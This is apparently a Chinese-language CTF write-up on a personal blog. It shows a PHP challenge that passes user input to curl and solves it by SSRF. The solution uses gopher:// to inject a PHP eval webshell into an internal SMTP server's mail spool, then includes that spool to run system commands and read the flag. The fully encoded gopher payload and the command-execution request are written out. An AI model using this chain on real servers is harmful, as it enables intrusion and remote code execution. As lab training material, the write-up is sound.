White's Blog.

利用curl的ssrf进行smtp日志污染getshell

字数统计: 567Reading time: 2 min
2019/11/01 Share

题目

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
highlight_file(__FILE__);
$x = $_GET['x'];
$pos = strpos($x, "php");
if ($pos) {
exit("denied");
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$x");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($ch);
echo $result;
?>

分析:

这道题可以发现flag.php是存在的,所以我们的初步目标是想办法读取flag内的内容。通过curl的file协议进行读取。发现flag.php内的内容是//there is no flag /etc/hosts 所以我们用file协议查看/etc/host,可以看到这个web服务器的ip。然后用同网段进行扫描,发现内网一台主机172.18.0.2的80端口打开着,还有它的25端口也打开着。然后用curl的http协议访问172.18.0.2发现源码写着include $_GET[a];。于是就可以通过控制参数a来任意读取文件。/etc/passwd中的postfix用户是用来搭建邮件系统的。此时,只要抓telnet和smtp服务器通讯包,然后用gopher协议重放发php马给服务器就行。这里要注意的是,gopher数据x需要二次url编码(不可见字符在服务器接收到之后已经解url编码一次了,而且在邮件内容的php马中会存在php字符串,不编码会被ban),接着就可以进行命令执行拿到flag。

php邮件马:

1
/?=gopher://172.18.0.2:25/%5f%4d%41%49%4c%25%32%30%46%52%4f%4d%3a%77%68%69%74%65%25%34%30%64%64%34%30%38%38%32%62%61%30%65%61%25%30%41%52%43%50%54%25%32%30%54%6f%3a%77%77%77%2d%64%61%74%61%25%34%30%6c%6f%63%61%6c%68%6f%73%74%25%30%41%44%41%54%41%25%30%41%46%72%6f%6d%3a%77%68%69%74%65%25%34%30%64%64%34%30%38%38%32%62%61%30%65%61%25%30%41%53%75%62%6a%65%63%74%3a%77%68%69%74%65%25%30%41%4d%65%73%73%61%67%65%3a%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%36%35%25%37%36%25%36%31%25%36%63%25%32%38%25%32%34%25%35%66%25%34%37%25%34%35%25%35%34%25%35%62%25%37%37%25%36%38%25%36%39%25%37%34%25%36%35%25%35%64%25%32%39%25%33%62%25%32%30%25%33%66%25%33%65%25%30%41%2e

读取flag

/?x=http://172.18.0.2:80/?a=/var/spool/mail/www-data%26white=system('cat%2520/Th7s_Is_Flag');

原文作者:White

发表日期:November 1st 2019, 12:58:49 pm

更新日期:November 7th 2019, 1:00:12 pm

CATALOG
  1. 1. 题目
  2. 2. 分析:
  3. 3. php邮件马:
  4. 4. 读取flag